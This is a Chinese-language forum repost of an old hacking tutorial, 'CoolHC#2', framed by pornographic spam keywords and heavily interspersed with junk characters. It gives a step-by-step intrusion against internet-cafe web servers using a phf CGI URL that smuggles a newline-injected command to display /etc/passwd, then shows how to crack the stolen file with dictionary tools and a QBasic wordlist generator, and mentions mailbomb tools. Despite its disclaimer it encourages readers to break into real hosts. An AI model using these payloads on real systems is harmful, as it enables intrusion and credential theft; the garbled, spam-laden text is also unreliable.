久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      • <sub id="9pxky"></sub>
    2. 

      <small id="9pxky"></small>
        

          

          汶上信息港
          
標(biāo)題: 如何破解系統(tǒng)(2) [打印本頁(yè)]
          

          
作者: 雜七雜八    時(shí)間: 2011-1-12 16:25
          
標(biāo)題: 如何破解系統(tǒng)(2)
          這不是一個(gè)教學(xué)文件, 只是告訴你該如何破解系統(tǒng),好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!
          
) s7 b4 l' Q- R2 q
          
' G- |# `7 `3 }9 x( K話說(shuō)上次 CoolFire 講到許多的 Net Coffee 店, 安全性之差實(shí)在是沒(méi)話說(shuō),但是過(guò)了這麼久也不見(jiàn)有幾家改進(jìn), 可能是想讓自己的電腦被別人玩弄在股掌之間吧, 但可不是每個(gè)人都像CoolFire這樣溫和, 如果遇到的是比較狠一點(diǎn)的角色, 那你的 Net Coffee 可能要有一兩天只賣Coffee 而沒(méi)辦法再 Net 下去了!!0 r! {& R5 s9 K, p8 r7 x
          
/ x2 y$ W0 Y0 o: J% L# [& \- o5 D
          
繼 CoolHC#1 推出後, 有許多人是否已經(jīng)躍躍愈試了呢 ?? 這次咱們不談新的花招,用用之前所講的再來(lái)探險(xiǎn)一番, 當(dāng)然, 這一次我照往例還是不會(huì)使用真正的 Domain Name 來(lái)作教學(xué),但是課程中的所有內(nèi)容絕對(duì)屬實(shí), 當(dāng)然本次攻擊的對(duì)象還是.... Net Coffee Shop....8 S$ V1 F8 f3 R" B% q& I
          
! K) `# _' t0 _' @  }
          
**談一下 Crack Jack 猜猜密碼
          
3 R$ H/ k3 |' T6 R* ?3 t' u7 w4 t) W$ H$ S0 y
          
許多人從上一次介紹 Crack Jack 之後就應(yīng)該已經(jīng)領(lǐng)教過(guò)它的功力了,但是有幾點(diǎn)需要說(shuō)明的, . }) T9 n( Y, s2 K7 |) S
          
有些人使用 Jack 來(lái)幫你尋找 password, 我就當(dāng)你已經(jīng)抓到了沒(méi)有 shadow 的 /etc/passwd, 
          
' t" H! U# H; C0 c8 {# Q, i( W, I但是為甚麼使用 Jack 還是找不到呢?? 我想你應(yīng)該要換個(gè)正點(diǎn)一點(diǎn)的字典檔了, 因?yàn)镴ack 還
          
  z& K) J) P$ J0 r是根據(jù)你所提供的字典檔在尋找, 如果你提供的字典本身就沒(méi)有這些字,那當(dāng)然連一個(gè)小小帳號(hào)
          
# U' s- l1 z; v- y9 `的密碼你都別想猜到了. 數(shù)一下你所使用的字典檔中有多少字 ???我用的字典檔有十九萬(wàn)多個(gè)
          
: O) h) I! E" {- `3 ]$ G( d字, 你的呢? 是不是小巫見(jiàn)大巫呀 ?? 那麼就趕快充實(shí)一下字典檔再重新尋找吧 !!* D( A7 E' j5 o/ J7 w
          

          
+ S* R  M9 Q5 o/ L許多人的密碼都有一定的法則, 我自己寫了 PaSs2DiC 就是將 UserName 由passwd檔轉(zhuǎn)成字典檔的工具, 這是對(duì)一些喜歡使用 UserName 當(dāng)作 Password 的人最好的方式,但是也曾經(jīng)好運(yùn)的找到別人的密碼, 真不曉得"甲"是不是暗戀"乙"才用"乙"的 ID 作為密碼的 ???你可以很簡(jiǎn)單的使用Qbasic 來(lái)制作 "序數(shù)" 密碼, 或日期密碼, 底下簡(jiǎn)單的作一個(gè) 0101 (一月一日) 到6 W2 H6 F) M+ M$ I2 ?: O# A
          
1231 的密碼
          
# k) S% _' P7 y5 H; {檔出來(lái):
          
5 O4 K4 F9 R8 w& V------------Cut Here MakeDate.BAS -------------------- j, E* w% H) }) J4 t
          
Open "Dates" for output as #1
          
# f  v2 [1 q% f; e: |for I=1 to 12% {' w+ [5 c" z
          
for J=1 to 31
          
+ C* {9 p( x" }8 P4 ~- r6 ZI1$=rtrim$(ltrim$str$(I)))
          
# ~& ^7 b+ T. |4 ?' n% ~J1$=rtrim$(ltrim$str$(J)))
          
  Q! ?/ r% ]1 i& `* U4 Jif len(I1$)=1 then I1$="0"+I1$
          
; Y' a" c  U% W( n  U; a' Lif len(J1$)=1 then J1$="0"+J1$
          
% O) q7 E) q, SOut$=I1$+J1$
          
/ H' q: c' `9 M, c8 Xprint #1,Out$ 
          
, j, @9 O+ l7 inext I
          
( }2 ?# h. T4 Z( r" f7 fnext J
          
7 G+ \& Q( [9 \% E4 j6 Z$ Yclose/ H! p* F3 H( [* ?3 U4 X5 A' H
          
------------ Cut Here End MakeDate.BAS ----------------
          
( v* Q* X$ G6 r5 L& a  A$ r這支小程式將會(huì)寫一個(gè) "DATES" 的檔案, 里面就是你要的字典, 當(dāng)然啦,這只是包含月跟日 !! 
          
) v! `$ ?1 Y! _7 x如果你要猜的密碼是含年份的, 你可能要再增加一些程式碼, 再 Run 一次試試看了,不過(guò)這是一個(gè)好的開(kāi)始不是嗎 ??
          
4 R0 \7 M5 W- n* E! Y5 T" E
          
% L" y7 W; N" H7 c/ R+ H# x**如何保護(hù)自己的密碼
          
+ V+ H$ H' E4 v7 A6 g  k; W2 R, F/ A2 d% H+ h
          
談了這麼多的密碼猜法, 當(dāng)然要談一下如何保護(hù)自己的密碼不被破解,
          
& B+ j* X- E6 c5 X# L. C5 E請(qǐng)遵守以下的原則:  [1]不用生日作為密碼(太容易猜了啦) [2]不用序數(shù)作為密碼(除非你的序數(shù)無(wú)限大)
          
# z0 J- F3 S0 B. h: E* z* ^[3]不用身份證字號(hào)作為密碼(LetMeIn! 里有猜身份證字號(hào)的功能耶)
          
9 O& D* l) P: e4 v) @8 \" Z[4]不用在字典中查得到的字作為密碼. 
          
3 R1 i( O- N$ E+ [3 z
          
" l* k/ k) `6 {  _2 o' J- V那麼依照上面的幾點(diǎn)說(shuō)法, 甚麼樣子的密碼最不容易猜, 自己也最好記呢?? 答案是:用一句有意義的話來(lái)作為自己的密碼, 例如: NoOneCanCrackIt 就是一個(gè)很難猜的密碼類型,基於這個(gè)密碼猜法的原則, 你的密碼是不是要作些更新, 或是大小寫要作一些對(duì)調(diào) ?? 如果你的密碼是% D( I7 ^" b7 k) }# l" B& E3 C
          
coolfire,
          
2 O" q5 p4 K$ V2 _2 N; q( T( }建議你最好能改成 CoolFire 或 coolfires (加復(fù)數(shù) "s"),  o* h7 J% q; k
          
這樣被猜中的機(jī)率就小了很多. 如果你是一個(gè) Hacker, 你的密碼也被人猜中的話... 那...#%%^^^&@9 q7 G; D0 p4 A: ?# C5 I- ^4 q
          
" U7 a% C  ^1 W6 I$ i* S8 Z! m
          
**正式的話題& c" L, W: _% t% b9 A6 W/ u& A" z0 _
          

          
( n& A  b" U& E, ~& p& Y, _9 t% X這次的話題當(dāng)然還是 Crack, 相信許多人已經(jīng)看過(guò) CoolHC#1 了,當(dāng)然眼尖的人可能也已經(jīng) D/L
          
4 M9 g) V: m4 _System Holes 試過(guò)了, 你有成功的例子嗎 ?? 如果沒(méi)有, 這份 CoolHC#2可能就是你的強(qiáng)心針,9 k0 |& W5 u  Z8 _3 r! y
          
因?yàn)檫@次談的正是 System Holes #1 成功的案例.Step 1. 連線到 "蕃薯藤" 找 "網(wǎng)路咖啡" 找到好多家網(wǎng)路咖啡的 WWW 網(wǎng)址,一一連上去試試看
          
8 B, d+ ^. S( |8 o1 E' D1 T! i8 ?9 G在 System Holes #1 中的方法可不可行.# W* p0 X8 N7 P4 j- J/ j
          
Step 2. 若可行則會(huì)傳回 /etc/passwd 資訊, 存檔後迅速 Logout, 使用 Crack Jack4 G2 B& U& z6 z7 E
          
解讀!!
          
" i3 o& [6 Y1 t- M" }& c
          
$ E  @! T1 g9 b; I# i: A[[實(shí)例探討]]  P0 @0 f" y: z3 k+ o- y
          
9 L4 k" h7 W8 X" z3 D+ i( {! R, x
          
System Holes #1 中所介紹的 WWW 入侵法是這樣子的:
          
0 U- R5 t2 ]' I9 |  Q6 ]; Jhttp://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再
          
3 h  l5 Z5 V! c" r9 Bhttp://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd) J" y) y/ M2 `1 W& G
          

          
9 d  F# q0 Z' d/ `# i[1] 用 WWW Browser 連到 yournet.net+ z9 w- Z8 ?& Z
          
[2] Location 輸入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"1 M, v. a: _8 H  B: z* P+ L5 Y! o
          
[3] 接著如果出來(lái)一份像 Report 的畫面的話, 接著輸入/ A. i6 `) q) i1 t* L* B- C0 S% @
          
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
          
* H0 {- x! O. ?. h  n. o; D: P[4] 發(fā)生了甚麼事?? etc/passwd 在你的瀏覽器中 "顯示" 出來(lái)了 !! 快點(diǎn) Save 吧* G5 c* `4 a; K# E& \5 [  ?* K- ~6 s
          
!!
          
* ]+ ]- Y: t5 U! V5 W. k* `# B6 c0 a4 h+ Q
          
這個(gè)方法所用的是系統(tǒng) "檢索" 的漏洞, 不提供這個(gè)功能,或是伺服器檢索類型不同的機(jī)器則不- V6 Y# F- l  W3 i
          
會(huì)接受這樣的指令, 當(dāng)然也就逃過(guò)我們這次的模擬演練啦 !! 但是.... 相信我,你一定會(huì)找到一家脫線的網(wǎng)路咖啡, 并沒(méi)有像我們一樣每天閱讀 Mail List 的信,對(duì)系統(tǒng)安全一點(diǎn)研究也沒(méi)有的人不在少數(shù). http://hacker.welcome.com 就是這樣的一個(gè) Net Coffee Shop...呵.... 快來(lái)試試吧 !! 
          
1 h3 Y  G; W5 |
          
& H, G+ K% r  z$ f% k  A, H5 ?3 \當(dāng) CoolFire 抓到 /etc/passwd 後, 立刻存檔, 也馬上斷線, 并且拿出 UltraEdit來(lái)瞧一下使用者的資訊, 當(dāng)然這個(gè)小 passwd 對(duì) Crack Jack 來(lái)說(shuō), 實(shí)在是不夠看,沒(méi)幾分鐘就在我的 486 機(jī)器上顯示出來(lái)幾個(gè)以 UserName 作為 Password 的資訊 (歸功於 PaSs2DiC 及CrackJack 的功勞)不過(guò)當(dāng)我試著找尋 root 的密碼時(shí), 一想到我那將近 20 萬(wàn)字的字典檔,就想到可能花費(fèi)的時(shí)間一定相當(dāng)?shù)捏@人, 於是就以 Jack 的 Option 設(shè)定只尋找 root 那一行, ...(過(guò)了良久)... 果不然又是一個(gè)笨 root. 用了 "非常" 容易猜的密碼... <--- This is JackAss... 呵!! Got It!9 o! p3 l  o3 t0 E+ {! c2 @$ e
          

          
$ H6 @/ t7 k4 j: s如果你所使用的機(jī)器速度不是頂快, 你最好能夠到快一點(diǎn)的機(jī)器上使用 Crack Jack,不然你也可以將字典檔切割成幾個(gè)小檔案, 然後再分別在幾臺(tái)機(jī)器上跑, 我目前使用的配備是486DX4-13032MB RAM, 3.2GB HDD, 近 20 萬(wàn)字的字典檔, 如果在分析較大的 passwd檔時(shí)我會(huì)將字典檔切割為四至五個(gè)小檔 (看有多少臺(tái)機(jī)器可跑),然後在周末下班前在公司的幾臺(tái)機(jī)器上分別執(zhí)行 Crack Jack, 等到禮拜一上班時(shí)就等著接收成果了! 當(dāng)然如果你只有一臺(tái)機(jī)器, passwd檔又很大的話,由於 Crack Jack 無(wú)法於 Windoz 95 下使用, 你可能只能犧升時(shí)間或機(jī)器來(lái)跑了!再?zèng)]有辦法的話, 亦可使用單機(jī)多工, 多開(kāi)幾個(gè) DOS Box 來(lái)跑 Brute, 也許也是一個(gè)可行的辦法!
          
) ]5 |, p7 Z8 L
          
- `, A1 T7 z  q# C* R0 V**後語(yǔ)
          
# U+ {' V/ B- A% t+ V+ B0 |. n/ U# Q: ?
          
有許多人在使用 Crack Jack 的時(shí)候有許多問(wèn)題, 不過(guò)看了 CoolHC#1 應(yīng)該都解決了吧?? 最近大家問(wèn)的比較多的是 UpYours 3.0, 雖然已經(jīng)改進(jìn)了 Install 的問(wèn)題,不過(guò)大家的問(wèn)題還是都出在Winsck.ocx 上面, 有人說(shuō)裝了 MSICP Beta 會(huì)好 ?? 但也有實(shí)例裝了也還不能 Run 的,+ G, s) E. k" P8 A: H
          
在此建議大家不要再玩 MailBomb 了, 雖然我喜歡收集這種東西, 但還是少亂炸為妙,已經(jīng)證實(shí)有許多常用的 MailBomb 沒(méi)有辦法 Fake IP 了 !! 所以... 如果 UpYours 3.0裝不起來(lái)的人就試試 KaBoom!V3.0 吧 ! 雖然沒(méi)有辦法 Fake IP (選錯(cuò) Mail Server 的話), 但是也是一個(gè)不錯(cuò)的AnonyMailer如果要發(fā)匿名信, 現(xiàn)在首頁(yè)上有可以幫你發(fā)信的 Mailer, 會(huì)安全一點(diǎn). 
          
; ~( ]" p, @' B0 l2 G. m
          
8 M' g, y+ l; T% ^" G: v如果你仍舊對(duì) UpYours 3.0 不死心, 就試試 ResSvr32.exe (Under Windows/systemrectory),! J, Q# i: D$ C8 \7 O/ [0 X  r! H
          
看看能不能將 WinSck.ocx 裝上了... 記得先 UnReg 再 Reg... 
          
0 J2 z, X: h" t$ o! U0 d% W! J0 b4 W( M0 m" G3 Y- m: S; Y
          
在此建議大家可以多訂閱一些 "系統(tǒng)安全" 討論的 Mail List或多參考一些已經(jīng)被找出來(lái)的系統(tǒng)漏洞, 因?yàn)橛行┤藢?duì)這些方面并不是很重視, 所以這些資訊也就顯得格外的重要了,如果能夠多參考一些資訊, 在你入侵的時(shí)候會(huì)有很大的幫助, 當(dāng)然, 如果你能作出一份列表出來(lái),放在手邊參考的話, 就可以快速的; 安全的入侵了!! 下一次所談的是 SendMail 的 Bug 實(shí)例,在這中間當(dāng)然照往例會(huì)先出一份 System Holes #2 來(lái)作為資料. 如果有興趣的人在 SH#2出來(lái)的時(shí)候可以先研究看看. 下次見(jiàn)! Merry X'Mas..... & Happy New Year.......
          
: {6 U6 H1 I) j5 s
          
' k* G- i3 }# p# L$ i6 B------
          
" M$ {) v" x# a: q: t; W9 N上次講的 Home Page 建置案還沒(méi)搞完, 沒(méi)有充實(shí)一下 Home Page 實(shí)在是對(duì)不起大家,所以利用一點(diǎn)時(shí)間寫了 CoolHC#2, 可能報(bào)告又交不出來(lái)了 !! 老話,如果你有興趣寫其它程式的中文說(shuō)明, 請(qǐng)完成後寄一份給我, 我將它放在 Home Page 上面讓其它人參考,當(dāng)然你也可以給我你的使用心得, 讓別人參考看看也行! 目前準(zhǔn)備收集一系列的 System Hole List,如果你在其它的站臺(tái)有看到的, 請(qǐng)把它先 Cut 下來(lái), Mail 一份給我 ! 3 c- d, g6 H% t5 }9 F* G3 `3 H
          

          
# V0 ]3 H* S! E, A! I* |  X- z; T------
          
# q. v: t4 E1 N" s8 |$ h再次重申, Crack 別人站臺(tái)之後不要破壞別人站臺(tái)中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機(jī).... (高-Net 還是除外)... 請(qǐng)勿將這類技術(shù)使用於破壞上 (又...如果第三次世界大戰(zhàn)開(kāi)打, 你可以任意破壞敵國(guó)的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機(jī)的話)... 就將它 Shut Down.... 好了! 別太暴力了!! G! Q' V1 s7 k/ S' {. p: N' R* D
          
+ q! ~6 K! [0 j& G& {% s2 r
          
                             
          
0 {0 h/ m# w( W! u" ?! X3 ?8 a3 t




          

          

          歡迎光臨 汶上信息港 (http://www.junkejituan.com/)

Powered by Discuz! X3.5